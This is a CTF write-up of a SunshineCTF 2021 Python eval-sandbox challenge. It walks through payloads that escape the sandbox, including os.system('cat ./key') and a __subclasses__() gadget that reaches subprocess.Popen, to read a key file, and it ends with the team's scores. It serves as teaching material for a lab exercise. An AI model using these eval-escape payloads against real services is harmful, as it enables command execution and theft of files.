Scripting
ProcrastinatorProgrammer
The challenge description is long and the challenge seems complex.
This may be a mistake. Or mistakes were made.
>I may have procrastinated security for procrastinate.chal.2021.sunshinectf.org:65000. I may have been watching too many Tom Cruise movies instead of releasing this... uh... last year.
>But don't worry! The keys to the kingdom are split into three parts... you'll never find them all!
>Flag will be given by our backend in the standard sun{} format, but make sure you put all the pieces together!
- Description in image
Got an url => Found out it’s a Python Sanbox Challenge
- This challenge is a chain-based problem. The player have to pass the previous level to pass the next level. There are three levels in this challenge.
1. First level
- Connect to the server:
nc procrastinate-sequel.chal.2021.sunshinectf.org 65000- Result:
Welcome to the ProcrastinatorProgrammer backend.
Please give me an equation! Any equation! I need to be fed some data to do some processing!I’m super secure, and can use all python! I just useeval()on your data and then whamo, python does all the work!Whatever you do, don’t look at my ./key!Give me an equation please!
- First attempt
- Payload:
chr(105) + chr(110) + chr(116) + chr(40) + chr(111) + chr(112) + chr(101) + chr(110) + chr(40) + chr(39) + chr(46) + chr(47) + chr(107) + chr(101) + chr(121) + chr(39) + chr(44) + chr(32) + chr(39) + chr(114) + chr(39) + chr(41) + chr(46) + chr(114) + chr(101) + chr(97) + chr(100) + chr(40) + chr(41) + chr(41) - Result
int(open(‘./key’, ‘r’).read())
If you completed part 1 of the challenge…
Your princess is in another castle! 🔥🏰🔥
procrastinate-castle.chal.2021.sunshinectf.org 65001 holds your next clue. - Turn out that there’s some way to escape the Python sandbox.
- Payload:
- Second attempt
- Payload:
__import__('os').system('cat ./key') - Result (shown as image below):
- Got first 1/3 of the flag:
sun{eval_is
- Got first 1/3 of the flag:
- Payload:
2. Second level
- Connect to the server:
nc procrastinate-sequel.chal.2021.sunshinectf.org 65000- Result:
Welcome to the ProcrastinatorProgrammer backend.
Please give me an equation! Any equation! I need to be fed some data to do some processing!Due to technical difficulties with the last challenge, I’ve upped my ante! Now I know it’s secure!I’m super secure, and can use most python math!
I just use
eval(client_input, \{\}, safe_math_functions)on your data and then whamo, python does all the work!Whatever you do, don’t look at my ./key!
Halt in the name of the law!
What was the ./key found in the previous challenge?
- Using the same payload from the first level.
__import__('os').system('cat ./key') - First attempt:
- Payload:
[].__class__.__base__.__subclasses__(). Dump all the subclasses modules (shown as image below)
- And then, I was stuck. Because there are a lot of subclasses, and I don’t know which to use. But I have a goal which is to read the flag in
./key, thus I have to find a way to executereadcommand in the system.- I’ve tried:
[].__class__.__base__.__subclasses__().index('file')to locatefilesubclass, but found nothing.
- I’ve tried:
- Payload:
- Several attempts after first one:
- First, I tried to look at the functionality of the modules I found above. And then I tried to use the module as the gadget to exectue
readcommand in system. - Finally, I saw
subprocess.Popenat the-4location of the list. Thus I use[].__class__.__base__.__subclasses__()[-4](["cat", "./key"])as the payload. And finally obtained the the last 1/3 of the flag which isonly_if_you_ast_whitelist_first}(shown as image below)
Concatenate the flag from each level
- First, I tried to look at the functionality of the modules I found above. And then I tried to use the module as the gadget to exectue
- Got flag:
sun{eval_is_safe_only_if_you_ast_whitelist_first}
Resouces:
CTF results
Place and points
- We registerd as the ToInfinityAndBeYANd, and got 663 points resulted in 13th in the ctf among 302 teams .
Categories
- We solved 8 challenges:.
Score over time
